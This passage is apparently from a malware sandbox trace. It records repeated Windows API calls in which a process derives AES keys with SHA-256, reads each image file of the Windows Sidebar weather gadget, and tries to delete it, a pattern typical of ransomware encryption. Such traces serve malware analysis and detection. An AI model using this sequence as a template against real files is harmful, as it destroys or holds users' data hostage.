sidebar\\gadgets\\weather.gadget\\images\\docked_gray_snow.png")) returned 0 [0195.836] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.836] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.836] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.836] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.836] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x31d5 [0195.836] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.840] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.840] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.840] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.842] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_thunderstorm.png")) returned 0 [0195.843] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.843] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.844] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.844] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.844] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x145 [0195.844] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.846] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.846] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.846] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.848] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\graystateicon.png")) returned 0 [0195.849] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.850] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.850] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.850] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.850] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x175 [0195.850] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.852] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.852] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.852] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.854] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\greenstateicon.png")) returned 0 [0195.855] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.855] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.856] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.856] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.856] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2d9 [0195.856] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.894] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.894] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.894] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.895] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\info.png")) returned 0 [0195.934] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.935] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.935] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.935] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.935] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18f [0195.935] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.936] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.936] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.936] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.938] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\notconnectedstateicon.png")) returned 0 [0195.938] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.939] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.939] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.939] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.939] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18f [0195.939] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.940] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.940] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.941] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.942] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\redstateicon.png")) returned 0 [0195.942] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.943] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.943] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.943] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.943] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e2 [0195.943] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.946] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.946] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.946] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.948] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\search_background.png")) returned 0 [0195.949] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.950] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.950] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.950] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.950] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x758e [0195.951] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.955] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.955] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.955] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.956] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked-loading.png")) returned 0 [0195.957] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.957] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.957] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.957] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.957] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ddb [0195.957] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.968] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.968] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.968] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.970] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_cloudy.png")) returned 0 [0195.971] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.971] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.972] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.972] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.972] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d83 [0195.972] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.107] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.107] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.107] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.109] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_few-showers.png")) returned 0 [0196.109] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.110] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.110] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.110] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.110] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7ee0 [0196.110] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.119] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.119] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.119] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.121] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_foggy.png")) returned 0 [0196.122] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.123] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.123] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.123] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.123] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7aae [0196.123] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.132] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.132] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.132] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.133] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_hail.png")) returned 0 [0196.133] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.134] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.134] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.134] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.134] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4bfb [0196.134] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.141] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.141] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.141] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.142] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter.png")) returned 0 [0196.143] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.144] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.144] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.144] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.144] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x60f5 [0196.144] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.264] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.264] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.264] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.266] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png")) returned 0 [0196.266] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.267] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.267] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.267] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.267] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4ee2 [0196.267] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.359] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.359] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.359] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.360] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full.png")) returned 0 [0196.436] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.437] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.437] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.437] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.437] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x65e9 [0196.437] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.440] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.440] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.440] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.441] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full_partly-cloudy.png")) returned 0 [0196.442] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.442] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.442] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.442] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.442] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4a10 [0196.443] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.446] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.446] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.446] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.447] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter.png")) returned 0 [0196.448] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.449] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.449] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.449] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.449] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x61ae [0196.449] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.488] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.488] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.488] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.489] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png")) returned 0 [0196.490] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.490] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.490] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.490] CryptDeriveKey (in: 